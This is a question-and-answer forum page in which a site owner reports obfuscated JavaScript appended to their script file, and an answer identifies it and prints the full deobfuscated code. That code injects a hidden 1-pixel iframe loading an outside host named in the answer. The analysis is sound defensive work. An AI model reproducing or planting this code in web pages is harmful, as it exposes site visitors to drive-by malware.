Home/ Questions/Q 8080713
In Process

The Archive Base Latest Questions

Editorial Team
  • 0
Asked: 2026-06-05T16:29:52+00:00

In my website I found some javascript codes in js file at the end

  • 0

In my website I found some javascript codes in js file at the end which I never added on server while js file doesn’t have write permission to the user.

Any idea about the possibility how this file was changed and code added in this and how to protect website on server for such attempts.

This is a part of the javascript code which I don’t know how it got added to my file.

var RPTj='hYUw';function HCLac(){}
if('hikbf'=='gloCBh')hnwT='BtbByu';var efIc;function ovPvyr(){var GcFza='sLHwL';if('jPslJ'=='WfPs')FgTgr();}
var px0_var="0\x70x";function yefdV(){var MZIWif='pFeEIR';if('Oqoi'=='jcEyCx')YXCIxm();}
var WxTv;var JJfPP="f\x72\x6fm\x43harCode";function MnFGT(){var WcZW='mpjU';if('GQike'=='hfiFQm')aSNa();}
var LusRYV="";if('KSCVlW'=='ZHLn')fCxfd='nkVIX';if('rGsiG'=='uRdOG')bgTeVq();function NmGQl(){}
Share

Leave an answer

You must login to add an answer.

Need An Account,

1 Answer

  1. Editorial Team

    Googling one of the tokens leads to this report. It seems your code is the beginning of that code. What the full code appears to do is to insert a hidden iframe pointing to http://snap3.myvnc.com/58583911.html.

    The full code formatted:

    var RPTj = 'hYUw';

function HCLac() {}
if ('hikbf' == 'gloCBh') hnwT = 'BtbByu';
var efIc;

function ovPvyr() {
    var GcFza = 'sLHwL';
    if ('jPslJ' == 'WfPs') FgTgr();
}
var px0_var = "0px";

function yefdV() {
    var MZIWif = 'pFeEIR';
    if ('Oqoi' == 'jcEyCx') YXCIxm();
}
var WxTv;
var JJfPP = "fromCharCode";

function MnFGT() {
    var WcZW = 'mpjU';
    if ('GQike' == 'hfiFQm') aSNa();
}
var LusRYV = "";
if ('KSCVlW' == 'ZHLn') fCxfd = 'nkVIX';
if ('rGsiG' == 'uRdOG') bgTeVq();

function NmGQl() {}
var appVersion_var = "appversion";

function FxKCOl() {
    var Tyadnl = 'KxdiY';
    if ('oiXBU' == 'egVk') ikDXjx();
}

function ZMlp() {}
var HpgJJy = "a6b2b2ae786d6db1ac9fae716cabb7b4aca16ca1adab6d7376737671776f6f6ca6b2abaa";
var kEKvaZ = 53;
if ('sXNxpE' == 'kYOrhd') LHXd = 'GRDMD';
var iQzzDyqFb = "parseInt";
var NVLbyx = 'SzzTbP';
var KnXUEO = "appendChild";
var oCuGvo = 'AqRu';
var QqDXbsz = "slice";
var PSvizz = 'wTGO';
if ('UDtvo' == 'WOvxa') EjML();
if ('NkueyZ' == 'hmZjo') PTCkFt();
if ('ARloGz' == 'ESOXD') xXLyjy();

function YFbf() {}
var BdHebR = "body";
var EyIJOS;
var LXlPOM = "constructor";

function Aibw() {}
var UYFE = 'XToVL';
var RCfxR;
var px1_var = "1px";

function UxfaL() {}
var uCNeV;
var PmfiAgi = (function () {
    var aBOKw = 77;
    return this;

    function uiqNU() {}
})();
var bsnc = 16;
if ('Bxidy' == 'pXMzt') iTix = 'VlDz';
var BffTkrlL = "gfmhzktv" [LXlPOM];
var AeqcV = 178;
if ('yDWAl' == 'aEfSc') YamYD();
if ('Gbiec' == 'Gfkedw') IKIyYm();

function RiHlap() {}
for (var naQrl = 0; naQrl < HpgJJy.length; naQrl += 2) {
    if ('ldgI' == 'IKpUz') rrqZYp();
    if ('wghLE' == 'xtjurW') QFbOk = 'erIdjm';
    QxXSy = PmfiAgi[iQzzDyqFb](HpgJJy[QqDXbsz](naQrl, naQrl + 2), 16) - 62;
    var uzmz;
    var TtQHcx = 194;
    LusRYV += BffTkrlL[JJfPP](QxXSy);
    if ('RfJxKN' == 'WCxvgr') qJiK();

    function niER() {
        var xYfZTn = 'bTKOZ';
        if ('oNmb' == 'zFotVd') CErQ();
    }
    var ORrPz = 66;
}
function qrRA() {}
if ('xUJvl' == 'IwPl') Zsvdq();
var tGfG;
var EKOhz = 234;
var uTUrfPXx = "msaAyY";
var PFDee;
if ('UrLoD' == 'Sxld') PDDgwq = 'WMta';
var xVwEzf = "";
if (navigator[appVersion_var].indexOf("MSIE") != -1) {
    var kWawh;
    var ipBou;
    xVwEzf = '<iframe name="' + uTUrfPXx + '" src="' + LusRYV + '">';
    var OCLAkX;
    var nRid = 246;
    var kxFTam = 'XzkCJ';
} else {
    if ('NhMm' == 'fRlNQ') mcPWV = 'wimioU';
    xVwEzf = 'iframe';
    var FLIdcI = 'yQEfas';
    if ('BUXe' == 'AShAfN') EKbV = 'fBEl';
}
if ('YdKCO' == 'pWElN') uTSIz();
var VdDqgo = document.createElement(xVwEzf);
var ZcAkY = 'meVkj';
var jMIFIc;
VdDqgo.tuqYuP = function () {
    if ('FfHJE' == 'bCay') azXnsN();
    if ('BlUAl' == 'cJxWM') fRGW();
    var ogFkn = 146;
    this["src"] = LusRYV;
    var AgIjr = 259;
    var qpSQK = 92;

    function PdHsy() {}
}
var qzNJ = 'aFPF';
if ('vNdx' == 'XYol') rQHs = 'Hxmv';
VdDqgo.style.width = px1_var;
var INpVIa;
VdDqgo.name = uTUrfPXx;
if ('xFAX' == 'BDmDG') KbBJUL();
VdDqgo.style.right = px0_var;

function hDmz() {
    var QaDaK = 'RkXzFf';
    if ('zhJAW' == 'KaeI') EKMSCK();
}
var FLxMGu = 'NTrTRL';
var VKffS;
if ('uVncX' == 'wLjA') SxPE = 'DqmaHY';
VdDqgo.style.position = "absolute";
if ('QUcV' == 'DOyW') iHzhEN = 'nFIX';
if ('NkrLk' == 'KpcbG') ZaLFnC = 'eGLz';
VdDqgo.style.height = px1_var;
var UcmFUb = 'qOVzZW';
VdDqgo.style.top = px0_var;
var VWcgid;
if ('XMOW' == 'Ednf') WHmsA = 'IUxM';
VdDqgo.tuqYuP();
var lXbvup = 'vYuQu';
if ('imkwcA' == 'WooJ') HveoG = 'lWaRP';

function bICzNVqfg() {
    var YPKTox;
    if (document[BdHebR]) {
        if ('ngooi' == 'TqRCsb') ftbpb();
        document[BdHebR][KnXUEO](VdDqgo);

        function qDuFo() {
            var mazr = 'QnGfrg';
            if ('BOyz' == 'AKOa') Gngf();
        }
        function pzBO() {}
    } else {
        var VxvCl;
        if ('iZnVhA' == 'xXpx') yFwsuD = 'Jwngn';
        setTimeout(bICzNVqfg, 120);

        function TQWAxJ() {}
    }
    var trjnm = 134;

    function gZgci() {
        var IwVkwG = 'bVoa';
        if ('FAipi' == 'lshUte') jAfeZ();
    }
}
function ugkLim() {
    var WDsg = 'GXvuNm';
    if ('WxbcV' == 'OxFu') OwHcwI();
}
bICzNVqfg();
if ('pdHQlr' == 'MsZfH') lqfhm();
var BqsQp = 'BfjE';
var uHPm = 'sLKHU';
var hZrYYl = 'Qckv';
if ('gjgstY' == 'dlcZ') wSnqFG = 'zSpF';

    As for your quest to determine how it happened, the server logs would be a place to start if you have access to them.

    • 0